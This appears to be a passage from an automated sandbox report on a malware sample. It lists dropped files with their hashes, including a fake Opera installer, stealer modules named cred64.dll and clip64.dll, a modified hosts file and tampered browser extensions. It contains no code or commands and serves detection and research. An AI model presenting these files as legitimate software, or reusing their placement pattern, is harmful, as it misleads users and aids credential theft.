SHA512 63df4d931b6144c0157e1f72d26e63eb77c90647920c725a8ae51663afbed639582580f68fcf2765b8a7e907b23f288c3a6439c2569768686a5c5973c6aa2a5d

memory/1872-327-0x0000000000660000-0x0000000000B98000-memory.dmp

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 7b3c64ae39ca7ed6469dea416580a8c0
SHA1 d42d01dc0cd8088f48c9357b808aad51a1e1ad2a
SHA256 cba8cf783b763221e30ef580be64bec770342794376648428c94e48ad261a3bc
SHA512 a75591294fea7ec1e4d577833b764737c25beb2da11d70221096e3f84fd5c83de0875674c79a30a82057a3b878c31a185ade621c4a868c0c523cc8c3be4b8344

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403150201444191872.dll

MD5 cd4e4cd6650ce4ff9364d3bceef86201
SHA1 f41be5f22b93a242737c255beb72549b4fde9d4d
SHA256 6168e0c56ae74148815683302dceec8ebc2d7e9d9edd766585220891bfee932f
SHA512 11d07d0edf5e39ccfde971522da0d53ec4d0f556e0a150ce17a27300256cb898b0b7f8dc25d4c839c8a7422d65a53012aff58e6eab4473edae0baaa8881d1807

C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe

MD5 ca25394a90c074c74fd7b59f561372e4
SHA1 01c1f8caac4ebc4c09d86e6b32eafedc84a25059
SHA256 31e24fab1af31ac5e19a54c0662e6ea26b3aad91c043d3c489a16ea02a50cc7a
SHA512 98e866f51e371caddf58d75b0819a7b8beb99ffdca0aac9e8bec3b862dcfef4f864d9430845d219c7025f7879563451c5ad6375c2fe92e2819948fb34497d584

memory/4824-351-0x0000000010000000-0x00000000105E9000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

memory/3292-361-0x0000000000400000-0x000000000063B000-memory.dmp

memory/3932-362-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/764-363-0x0000000000400000-0x0000000000930000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1428-365-0x00007FFD64580000-0x00007FFD65041000-memory.dmp

memory/1428-367-0x00000156EF6F0000-0x00000156EF700000-memory.dmp

memory/1428-366-0x00000156EF6F0000-0x00000156EF700000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

memory/1428-380-0x00007FFD64580000-0x00007FFD65041000-memory.dmp

memory/236-389-0x00007FFD646A0000-0x00007FFD65161000-memory.dmp

memory/236-391-0x000002CBC73D0000-0x000002CBC73E0000-memory.dmp

memory/236-402-0x000002CBC73D0000-0x000002CBC73E0000-memory.dmp

memory/2472-405-0x000002BF1D1A0000-0x000002BF1D1B0000-memory.dmp

memory/2472-406-0x000002BF1D1A0000-0x000002BF1D1B0000-memory.dmp

memory/2472-404-0x00007FFD646A0000-0x00007FFD65161000-memory.dmp

memory/236-421-0x000002CBC7850000-0x000002CBC786C000-memory.dmp

memory/236-423-0x000002CBC7870000-0x000002CBC7925000-memory.dmp

memory/236-422-0x00007FF4546F0000-0x00007FF454700000-memory.dmp

memory/236-424-0x000002CBC73D0000-0x000002CBC73E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 65a68df1062af34622552c4f644a5708
SHA1 6f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256 718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA512 4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

memory/236-430-0x000002CBC75E0000-0x000002CBC75EA000-memory.dmp

memory/236-431-0x000002CBC7A70000-0x000002CBC7A8C000-memory.dmp

memory/236-432-0x000002CBC75F0000-0x000002CBC75FA000-memory.dmp

memory/236-437-0x000002CBC7AB0000-0x000002CBC7ACA000-memory.dmp

memory/236-438-0x000002CBC7600000-0x000002CBC7608000-memory.dmp

memory/236-439-0x000002CBC7A90000-0x000002CBC7A96000-memory.dmp

memory/236-440-0x000002CBC7AA0000-0x000002CBC7AAA000-memory.dmp

memory/3932-441-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/2472-443-0x00007FFD646A0000-0x00007FFD65161000-memory.dmp

memory/236-442-0x000002CBC73D0000-0x000002CBC73E0000-memory.dmp

memory/236-446-0x00007FFD646A0000-0x00007FFD65161000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

memory/3740-452-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3740-453-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3740-456-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3740-457-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3740-460-0x0000000140000000-0x000000014000E000-memory.dmp

memory/5072-462-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5072-461-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5072-463-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C3AE.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

memory/5072-464-0x0000000140000000-0x0000000140848000-memory.dmp

memory/3740-454-0x0000000140000000-0x000000014000E000-memory.dmp

memory/5072-465-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5072-466-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-482-0x00000000005C0000-0x00000000005DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe

MD5 42b838cf8bdf67400525e128d917f6e0
SHA1 a578f6faec738912dba8c41e7abe1502c46d0cae
SHA256 0e4ffba62ce9a464aa1b7ff9f1e55ace8f51ff1e15102d856f801a81f8b4607d
SHA512 f64b39d885375251ab7db72c57dc5b5095f0c6412169f1035d1f6a25b8415a2a01004d06bfa0267cf683ef7dea7a9f969ad43fde5a4376f1fcb65a57403433c0

memory/3292-487-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\757987694264

MD5 e713d3899bc2b5f1889ad6e3eab0d40c
SHA1 dc3f735cf6452be41a247b31b57d46e251bd84da
SHA256 802ec6b99b93186f77b6f3079883351cf9b0129b74e6e2a70496efc3785b71a9
SHA512 fc5422bbfb47ef7ed04edb5b60ee47d47ab06cdebb9b3f526b6d628d4b2da5fcca2ab3c894eeea90a252b9809f19d15fdf02f34b6e60e71d1d98c1fb873277ed

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\opera_package

MD5 33a1ec3984685638093bfec370960c62
SHA1 1415a93d59e620bcfccc574761d3ab45e88dbb63
SHA256 8dd25ef5033a1033c3aaef6927d49c35c09538a0ce06dc0e6d74aa3e647df22b
SHA512 7c2f1ff1804653c0af124935f05bfe3a6420d162061b996f4c5e37432b9cc75be8f9722a00946d9576459423b600161cd59dd6b4dcc65e8b381a64d1434dffc5

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\additional_file0.tmp

MD5 54ffc65075d71d6b58e7acff0233991f
SHA1 dc6aa42f02c3c25335b7f9880eac98ad1a87624c
SHA256 507b0c6540fdf00a3083b4584c8c8f75592c9c58c4053930503a269414f3fffb
SHA512 1a94464736ae740bf8d568642798d1c577e6404e9b24ea567dfcb6bef99a8c9073833af0c8b33f7e6cbdc39dbc255cfd8b02f782910449e3e081aab9239c444b

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 a11a5dfb68a6ea41b0164c2adcd3563f
SHA1 b3738918981417bf2765ba5130767cba4a387822
SHA256 6a009663a290735c63d076e1873dff78badb89516aec581b11dc6bb260f83883
SHA512 8131a0aa8c03c15ff36e01207b611d8a23916ea3f9ccf9a452212ce806c49391e02e942170274be22b4ef6d13094aeecbea9f50282fbfe64cc345e6328378632

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

MD5 7bf982e55fca36bf1d470264acd37e9c
SHA1 6f6cf2e8dab446bdb477874f36d65072c74ebd37
SHA256 cbc2832b385cdc08afd4b0a150fc7cf70643ae60e60d4d910347c6d1d1eb184e
SHA512 3665a1937060e017d07bbb770fb6bd6b49903564eb762aef3ba7a62f5cb28ec8a87164c34bcaf96bb12270887c08856e0a8d436edd3670a1b88ac2afe9b28675

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

MD5 19a0511c3835f200572372af43cd953c
SHA1 cba4b465443d2f24a4b292e8d287d8f0e9d992b8
SHA256 9d552e0a6c64aa82c5644d351cb487aec0999e08e53eec266073930332082aa0
SHA512 e7bdb99df8ea0f967b99a0981aaff2b2ac9758eab558fee8287c2eae4314de3753cbfe454719030a6f793d9fde361b59a6daf4289d13b307f7c68b53bc2293ee

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 ba8c5dc5ec763007a4af9cb06bef78ef
SHA1 a50aaf51e7d5998a4cb7a4218f463b06fd005b5e
SHA256 26b468da8e91ddbb807a9f8c95e2bd3f01510cb9438d7ae6134d108900e06b88
SHA512 e065ea526ee8843db6f74f29b8b545ff0b6333084242aaa9998287ef17a5bf86fb7c3709fc997e31272124468c6f68218759044c5a36cb22f3ec743605eb885c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe

MD5 b3f05009b53af6435e86cfd939717e82
SHA1 770877e7c5f03e8d684984fe430bdfcc2cf41b26
SHA256 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7
SHA512 d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\dbgcore.dll

MD5 8b6f64e5d3a608b434079e50a1277913
SHA1 03f431fabf1c99a48b449099455c1575893d9f32
SHA256 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
SHA512 c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\dbghelp.dll

MD5 925ea07f594d3fce3f73ede370d92ef7
SHA1 f67ea921368c288a9d3728158c3f80213d89d7c2
SHA256 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
SHA512 a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 dbd964c5bacfeccb4182e6c740f70916
SHA1 e2d3b6d42fd41d890632636cca32d6cb6cdb3d5a
SHA256 13bad0cbf56b359a0fbe62ea2ea0c2c838e49fa271d7248b2938cb911b9904e0
SHA512 50ca2b6c12edfb555304b59662f79c2a2d9ce6c1bc7cdbc44fbebb9c337b061a34f204c1a7c47fb1800ee5bdf85b56115e05f60eb580860fa38329ba7f20cb96

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 a0552b13263738b5cb0155770f3160f3
SHA1 43c19c4e50cb374518f99e58bbaae880d494b14b
SHA256 a15f7b51bc545c84e15d97e643d265dd4ca5e3b91e8eaa55853d0aa8eb92d405
SHA512 74a9d1ef06bf9c98845a46c73969fc4eb813b633a9130c9281096b69b88753eaad8d47cec853d655b0c833da31cadfddead3e0f09543a2981a5e4ab826695ecf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs.js

MD5 6f311177f167a1fb94b13c4576abbe5e
SHA1 258a40f693889c3f66eb675f228a5df363e8865d
SHA256 7b7a37ef1bcb21c53cce2a818ba8716f9d7190c8e816f959c8759d4139528fb7
SHA512 f9b9ea778fd536974fd4b272edc7612eaeb2ee1ad5ea1094c24a299e7ece6855d51f5fc37b0dae5a5e036323fdc1fd3a5790705d51b98a32a0be0708a75ce170

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 33e748959f4844291b38815bfdf32542
SHA1 5b3f1b6c8b470bb5516e9d79ec4f60b1bbdba81e
SHA256 f88c30d3fedd2f60583512eb4f37ca29ad07a139c4243a47c5e91cded66b65a0
SHA512 978a93418256be2620ab379cbb0d566395565fa84909d1104b576fbbf0a4b6a5f730b9f420aab8af6951b056bb500bed4b4c1be86ccb38719ee1e4053291f2d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 034e17601abc331135e8a448698f379f
SHA1 c1d7830f1b4aaec0b4af2abec0c3ac03ca7fe7b7
SHA256 66ab2f85745ebf705215079bc5059bae08fb453511fd7d2b3ed4cffd85d96db6
SHA512 49c680182e6900c8db62e2925d784a7a1fc6f5a7d18784ff8b7688caca39aabbcfd762774962f190c2d161fd8ed77e41ed6d190613963637f85a04555245f1e0